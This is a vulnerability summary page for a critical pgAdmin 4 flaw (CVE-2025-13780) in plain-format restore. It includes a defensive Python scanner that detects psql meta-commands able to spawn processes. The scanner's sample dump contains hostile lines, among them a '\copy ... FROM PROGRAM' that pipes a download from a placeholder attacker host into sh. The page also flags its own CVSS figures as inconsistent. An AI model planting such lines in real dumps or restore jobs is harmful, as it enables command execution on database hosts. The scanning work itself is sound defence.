Remote Code Execution Vulnerability in pgAdmin Affects Server Mode Functionality
CVE-2025-13780

9.1 CRITICAL

Key Information:

CVE Published: 11 December 2025

Badges: Trended, Score: 2,250, Exploit Exists, Public PoC, News Worthy

What is CVE-2025-13780?

CVE-2025-13780 is a critical vulnerability in pgAdmin 4, the widely used open-source management tool for PostgreSQL. It affects pgAdmin 4 up to and including version 9.10 (fixed in 9.11) and is only reachable when pgAdmin runs in server mode, the multi-user web deployment, rather than as the desktop application. The flaw lies in the Restore tool's handling of PLAIN-format dumps, which are SQL scripts rather than archives: insufficient validation of a plain-text restore lets an attacker execute arbitrary shell commands on the host running pgAdmin, not just statements inside the database. The CVSS vector (Privileges Required: Low, User Interaction: None) indicates that an authenticated pgAdmin user can trigger it without help from anyone else. Compromising the pgAdmin host exposes the database connections it manages and gives the attacker a foothold for further attacks on the surrounding infrastructure.
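A PLAIN-format dump is a script for psql (pg_restore cannot read it), and psql executes any backslash meta-commands it finds in that script: \! runs a shell command, \copy ... FROM PROGRAM and \g/\o/\w |cmd go through a shell, and \i pulls in and executes another file. The page does not say which of these the published exploit relies on, so the gate below is a defence-in-depth check that is useful regardless: before a plain-format restore in server mode, or when triaging a dump someone has uploaded, reject any script that would spawn a process on the pgAdmin host. The scanner is an added example, not pgAdmin's own restore validation and not the fix shipped in 9.11; the sample dump, the attacker.invalid URL and the file paths inside it are constructed placeholders, and the function names are this example's own. It skips COPY ... FROM stdin data blocks (where backslashes are data, not commands, until the \. terminator), strips quoted strings and -- comments before matching, and reports SQL-level COPY ... FROM PROGRAM separately because that runs on the PostgreSQL server rather than the pgAdmin host.

```python
import re
from typing import List, Tuple

# psql meta-commands that start a process or read a file on the machine running psql.
# When pgAdmin restores a PLAIN-format dump, that machine is the pgAdmin server.
HOST_PATTERNS = [
    (re.compile(r"\\!"), r"\! executes a shell command"),
    (re.compile(r"\\copy\b.*\b(?:from|to)\s+program\b", re.I), r"\copy ... PROGRAM executes a shell command"),
    (re.compile(r"\\(?:gx?|o|w)\s*\|"), r"\g / \o / \w |cmd pipes through a shell"),
    (re.compile(r"\\(?:ir?|include(?:_relative)?)\b"), r"\i / \ir includes and executes another file"),
]
# SQL-level COPY ... PROGRAM runs on the PostgreSQL server (as the database's OS user), not on the pgAdmin host.
SERVER_PATTERN = re.compile(r"\bcopy\b.*\b(?:from|to)\s+program\b", re.I)

# Quoted strings, quoted identifiers and -- comments: nothing inside them is a meta-command.
# Dollar-quoted bodies are not parsed, so a backslash command inside $$...$$ is still reported.
NOISE = re.compile(r"'(?:[^']|'')*'|\"(?:[^\"]|\"\")*\"|--.*")
COPY_STDIN = re.compile(r"^\s*copy\b.*\bfrom\s+stdin\s*;", re.I)

Finding = Tuple[int, str, str]  # (line number, where it would execute, reason)


def scan_dump(sql: str) -> List[Finding]:
    """Return every line of a plain-format dump that would execute a command if fed to psql."""
    findings: List[Finding] = []
    in_copy_data = False
    for lineno, line in enumerate(sql.splitlines(), start=1):
        if in_copy_data:
            # Inside COPY ... FROM stdin the lines are data; psql does not interpret backslashes
            # there. An early "\." ends the block, after which scanning resumes.
            if line.strip() == r"\.":
                in_copy_data = False
            continue
        if COPY_STDIN.search(line):
            in_copy_data = True
            continue
        code = NOISE.sub("", line)
        for pattern, reason in HOST_PATTERNS:
            if pattern.search(code):
                findings.append((lineno, "pgadmin-host", reason))
                break
        else:
            if SERVER_PATTERN.search(code):
                findings.append((lineno, "db-server", "COPY ... PROGRAM executes on the PostgreSQL server"))
    return findings


def safe_to_restore(sql: str) -> bool:
    """Gate for a restore job: refuse the script if anything in it would spawn a process."""
    return not scan_dump(sql)


# Constructed sample; not the output of a real pg_dump run. Line numbers matter for the demo.
SAMPLE_DUMP = r"""--
-- Constructed sample of a PLAIN-format dump (placeholder content)
--
SET statement_timeout = 0;
\connect appdb
CREATE TABLE public.notes (id integer, body text);
COPY public.notes (id, body) FROM stdin;
1\tdata rows are sent verbatim, so \! here is only text
\.
INSERT INTO public.notes VALUES (2, 'a literal \! inside quotes is not a meta-command');
\! id > /tmp/pwned
\copy public.notes FROM PROGRAM 'curl http://attacker.invalid/x | sh'
SELECT 1 \g |sh
\i /etc/pgadmin/extra.sql
COPY public.notes FROM PROGRAM 'id';
"""

if __name__ == "__main__":
    for lineno, where, reason in scan_dump(SAMPLE_DUMP):
        print(f"line {lineno:>3} [{where}] {reason}")
    print("safe to restore:", safe_to_restore(SAMPLE_DUMP))
```

Run stand-alone it reports lines 11 to 14 as host-side command execution and line 15 as server-side, and refuses the script; the benign \connect, the COPY data row and the string literal on line 10 produce nothing. The check is deliberately strict: a false positive costs a manual review, a false negative costs the host.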

Potential impact of CVE-2025-13780

  1. Data Breach Risks: pgAdmin is typically used to administer production databases, so an attacker who gains command execution on the pgAdmin host can reach the database connections it manages and exfiltrate sensitive data.

  2. Server Compromise: Arbitrary command execution lets the attacker take full control of the pgAdmin host, install malware or persistence, and use the machine as a pivot into the rest of the organisation's network.

  3. Operational Disruption: Exploitation can cause downtime or degraded performance of the database management tooling, disrupting the teams and processes that depend on pgAdmin.


Affected Version(s)

pgAdmin 4, versions 0 through 9.10 inclusive (fixed in 9.11)

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate that a vulnerability can be exploited. It is also a key ingredient of weaponization, which can end in ransomware. This page marks a public PoC as available for CVE-2025-13780 but does not link to it, so treat any script claiming to be that PoC as untrusted until you have read it.

News Articles

Critical pgAdmin Vulnerability Let Attackers Execute Shell Commands on the Host

A severe security vulnerability has been uncovered in pgAdmin 4, the popular open-source PostgreSQL database management tool.

Critical pgAdmin Flaw Allows Attackers to Execute Shell Commands on Host

Tracked as CVE-2025-13780, the flaw affects pgAdmin 4 versions before 9.11 and exploits weaknesses in how the database administration tool validates plain-text restore operations.

CVSS V3.1

Score: 9.1
Severity: CRITICAL
Confidentiality: High
Integrity: Low
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed

Note: these components do not reproduce the 9.1 headline under the CVSS 3.1 base-score equations; AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H computes to 9.9. Either the score or one of the component values above is mis-transcribed, so confirm the vector string against the NVD or CNA record before reusing it.

Timeline

  • Vulnerability started trending
  • First article discovered by gbhackers.com
  • Public PoC available
  • Exploit known to exist
  • Vulnerability published
  • Vulnerability reserved